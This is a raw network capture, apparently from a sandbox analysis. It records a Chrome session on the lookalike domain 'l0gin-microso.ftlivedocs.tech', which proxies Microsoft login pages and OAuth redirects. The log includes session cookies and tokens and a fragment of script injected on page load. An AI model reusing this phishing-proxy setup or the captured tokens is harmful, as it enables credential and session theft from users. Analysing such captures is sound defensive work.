                                                                                                                              2024-10-04 13:11:08 UTC1369INData Raw: 4f 33 2b 63 48 30 51 6e 6a 43 66 49 59 33 4f 67 4a 2f 50 51 6a 41 50 48 77 4a 65 58 39 39 43 6b 70 43 2f 30 74 36 67 41 4a 2f 53 49 46 38 7a 54 30 4f 51 6b 44 4e 54 41 53 47 52 66 35 46 6a 44 35 4a 52 51 67 41 68 34 54 53 53 6f 46 48 79 63 71 43 78 39 41 44 79 4d 74 52 69 64 44 47 54 59 6a 50 53 78 4f 4c 7a 38 37 4b 7a 39 43 50 46 55 76 51 44 52 61 58 6a 34 34 53 6d 46 52 49 32 46 65 50 6b 31 32 62 57 39 48 65 54 4a 47 54 44 56 61 4e 31 68 7a 66 54 70 65 54 6b 4a 2b 59 6e 71 46 68 57 57 4c 63 46 35 6f 53 47 39 4f 5a 49 57 51 55 47 5a 31 6b 46 56 30 6a 59 31 38 65 70 52 73 63 48 71 6e 6f 6e 42 35 68 58 39 65 66 58 6d 68 70 59 53 68 61 70 57 4e 67 58 65 43 6b 36 65 78 70 6f 32 58 6c 72 79 53 6a 49 2b 32 6c 37 4f 39 6f 36 43 53 6d 35 2b 6c 6c 34 62 42 6f 4b
                                                                                                                              Data Ascii: O3+cH0QnjCfIY3OgJ/PQjAPHwJeX99CkpC/0t6gAJ/SIF8zT0OQkDNTASGRf5FjD5JRQgAh4TSSoFHycqCx9ADyMtRidDGTYjPSxOLz87Kz9CPFUvQDRaXj44SmFRI2FePk12bW9HeTJGTDVaN1hzfTpeTkJ+YnqFhWWLcF5oSG9OZIWQUGZ1kFV0jY18epRscHqnonB5hX9efXmhpYShapWNgXeCk6expo2XlrySjI+2l7O9o6CSm5+ll4bBoK
                                                                                                                              2024-10-04 13:11:08 UTC1369INData Raw: 44 39 62 34 43 78 59 54 43 51 37 2b 42 4f 41 53 42 66 73 6f 42 78 30 65 4b 67 77 6c 35 67 38 61 45 79 34 48 49 51 59 45 49 52 66 7a 44 51 67 6f 47 76 34 66 48 6a 5a 43 50 54 73 6e 4b 45 59 6c 50 6a 34 36 4b 51 63 50 53 7a 30 77 43 30 73 31 53 53 6c 47 54 31 42 47 47 45 56 57 4c 53 6c 4b 57 6c 6f 57 51 46 6b 6e 53 56 4d 33 4b 31 74 56 4b 45 68 63 54 6b 34 7a 54 6c 4a 54 57 47 31 6c 4d 6b 56 73 5a 56 31 76 62 58 41 36 56 47 56 67 51 45 4e 34 64 6e 39 44 52 58 68 62 54 35 46 2b 58 33 46 6c 64 49 70 58 6d 48 64 53 6a 6c 6c 34 66 6d 79 41 69 6e 2b 69 58 49 32 45 6d 6f 65 47 5a 6d 75 4d 6e 5a 61 6e 6d 70 32 54 72 6f 65 68 71 61 4b 79 6c 49 74 33 70 71 32 62 6f 4a 79 65 6c 4a 42 37 72 6f 44 44 74 37 61 44 68 36 53 36 69 4d 72 4f 76 49 71 30 6b 73 43 7a 30 70 57
                                                                                                                              Data Ascii: D9b4CxYTCQ7+BOASBfsoBx0eKgwl5g8aEy4HIQYEIRfzDQgoGv4fHjZCPTsnKEYlPj46KQcPSz0wC0s1SSlGT1BGGEVWLSlKWloWQFknSVM3K1tVKEhcTk4zTlJTWG1lMkVsZV1vbXA6VGVgQEN4dn9DRXhbT5F+X3FldIpXmHdSjll4fmyAin+iXI2EmoeGZmuMnZanmp2TroehqaKylIt3pq2boJyelJB7roDDt7aDh6S6iMrOvIq0ksCz0pW
                                                                                                                              2024-10-04 13:11:08 UTC3INData Raw: 51 3d 3d
                                                                                                                              Data Ascii: Q==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.1749804104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:08 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:08 UTC349INHTTP/1.1 404 Not Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:08 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: OJsGAxN8qj6DrvDaz5peZlZzqVoYom3qgeY=$pQsbHOjbUeTv7CMI
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a87cc940f9c-EWR
                                                                                                                              2024-10-04 13:11:08 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.1749805104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:08 UTC1302OUTGET /KUtIdFka?S=UmxuHlo HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/KUtIdFka
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd
                                                                                                                              2024-10-04 13:11:08 UTC600INHTTP/1.1 302 Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:08 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Location: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2m3l7rtQtpK2sWwB8e9p49WXrye%2FI3XTAm5QGsT%2BA7RitU0pFzjUWIB%2FR1fxi9UGsrQo2U2D89AZypMiKmiGV9LMVE5xTGcveSOEawyIqGePp7eKdQmZODIm4CqAaxilZuRAbcLoWtmMlr%2FHS0%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a87fd0e41ad-EWR
                                                                                                                              2024-10-04 13:11:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.1749806104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:08 UTC1284OUTGET / HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/KUtIdFka
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd
                                                                                                                              2024-10-04 13:11:09 UTC1350INHTTP/1.1 302 Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:09 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Expires: -1
                                                                                                                              Location: https://www.ftlivedocs.tech/login
                                                                                                                              Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Pragma: no-cache
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+bno"}]}
                                                                                                                              Set-Cookie: fpc=AiTvsUNzDMhLtivCMH0SOIk; Path=/; Expires=Sun, 03 Nov 2024 13:11:08 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe6JSh8XySIX2JZIyDEcAnTGHJW7xDRybzTrnJSMuljy1faq4uekBlYW6QepUzkeCCVeoETYsf77cKfqUAaCR3HLP0IdxhCl6lLOWFylALBPap_5Jy1OH6KOB0tgqhPeFvx9h3RpcXxRAQOONMX0l8end4UyP-YrFmgiLM0lyRyksgAA; Path=/; Domain=l0gin-microso.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: stsservicecookie=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Ms-Ests-Server: 2.1.19005.9 - SCUS ProdSlices
                                                                                                                              X-Ms-Request-Id: 84a98c16-0a45-442f-bde5-6e37bf567b00
                                                                                                                              X-Ms-Srs: 1.P
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              2024-10-04 13:11:09 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 64 35 36 61 38 38 65 38 33 37 34 34 30 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8cd56a88e837440c-EWR
                                                                                                                              2024-10-04 13:11:09 UTC1290INData Raw: 35 30 33 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 20 28 29 20 3d 3e 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 77 61 69 74 46 6f 72 45 6c 6d 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 74 3d 3e 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 72 65 74 75 72 6e 20 74 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 3b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 6f 3d 3e 7b 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c
                                                                                                                              Data Ascii: 503<html><head><title>Object moved</title><script>window.addEventListener("load", () => { function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySel
                                                                                                                              2024-10-04 13:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.1749808172.67.71.1244432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:09 UTC1242OUTGET /login HTTP/1.1
                                                                                                                              Host: www.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5
                                                                                                                              2024-10-04 13:11:09 UTC1313INHTTP/1.1 302 Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:09 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Location: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Request-Context: appId=
                                                                                                                              Set-Cookie: OH.DCAffinity=OH-eus; Path=/; Expires=Fri, 04 Oct 2024 21:11:09 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: OH.FLID=47951cb7-03f5-4007-86df-aabc52bf5ae2; Path=/; Expires=Sat, 04 Oct 2025 13:11:09 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-04 13:11:09 UTC1343INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 53 49 44 3d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 75 48 30 33 66 75 74 45 35 69 31 5a 6f 50 6d 4d 42 71 5a 56 73 68 76 5a 64 46 76 46 35 34 62 36 31 75 42 62 6f 7a 62 4d 6e 72 74 67 73 4a 42 56 39 73 77 4e 45 63 2d 41 61 41 53 6a 65 4e 79 43 79 56 43 39 57 4a 31 56 45 39 78 43 7a 54 6b 65 32 4e 4b 52 4c 64 72 35 79 4c 43 39 45 70 4b 74 6e 35 4d 62 62 6d 56 57 79 4f 6c 6e 37 44 67 38 32 73 43 47 55 62 68 63 72 78 6b 4a 70 7a 48 67 49 69 39 64 65 64 71 39 43 4d 44 50 65 34 4e
                                                                                                                              Data Ascii: Set-Cookie: OH.SID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMTSet-Cookie: .AspNetCore.OpenIdConnect.Nonce.uH03futE5i1ZoPmMBqZVshvZdFvF54b61uBbozbMnrtgsJBV9swNEc-AaASjeNyCyVC9WJ1VE9xCzTke2NKRLdr5yLC9EpKtn5MbbmVWyOln7Dg82sCGUbhcrxkJpzHgIi9dedq9CMDPe4N
                                                                                                                              2024-10-04 13:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.1749809104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:10 UTC2374OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd; fpc=AiTvsUNzDMhLtivCMH0SOIk; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe6JSh8XySIX2JZIyDEcAnTGHJW7xDRybzTrnJSMuljy1faq4uekBlYW6QepUzkeCCVeoETYsf77cKfqUAaCR3HLP0IdxhCl6lLOWFylALBPap_5Jy1OH6KOB0tgqhPeFvx9h3RpcXxRAQOONMX0l8end4UyP-YrFmgiLM0lyRyksgAA; stsservicecookie=estsfd; MUID=0572C4040C3160E33E86D10A0D3661F9
                                                                                                                              2024-10-04 13:11:10 UTC1293INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:10 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Expires: -1
                                                                                                                              Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Pragma: no-cache
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+bno"}]}
                                                                                                                              Set-Cookie: esctx-hafTsFBjF8Q=AQABCQEAAADW6jl31mB3T7ugrWTT8pFe5TybCsSosJF9LjgYSDC14al1AqasXUpYtR6kaTzvEFKyuSjcYMOS1IuHvaikexuBqdlXTeg9a_4OR4CLSyJFMR1qSPhUBZ2GwdDAi2Tuhd6TN9gCfz08LrZJimKA6kkvFTLrig9WuWp6O1HngB__ISAA; Path=/; Domain=l0gin-microso.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: fpc=AiTvsUNzDMhLtivCMH0SOIk; Path=/; Expires=Sun, 03 Nov 2024 13:11:10 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Ms-Clitelem: 1,50168,0,,
                                                                                                                              X-Ms-Ests-Server: 2.1.19005.9 - SCUS ProdSlices
                                                                                                                              X-Ms-Request-Id: 19c9d45b-29ac-44c9-8ea2-eb09c8fc0f00
                                                                                                                              X-Ms-Srs: 1.P
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a926ae35e6b-EWR
                                                                                                                              2024-10-04 13:11:10 UTC1369INData Raw: 35 35 34 66 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20
                                                                                                                              Data Ascii: 554f... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head> <title>Redirecting</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible"
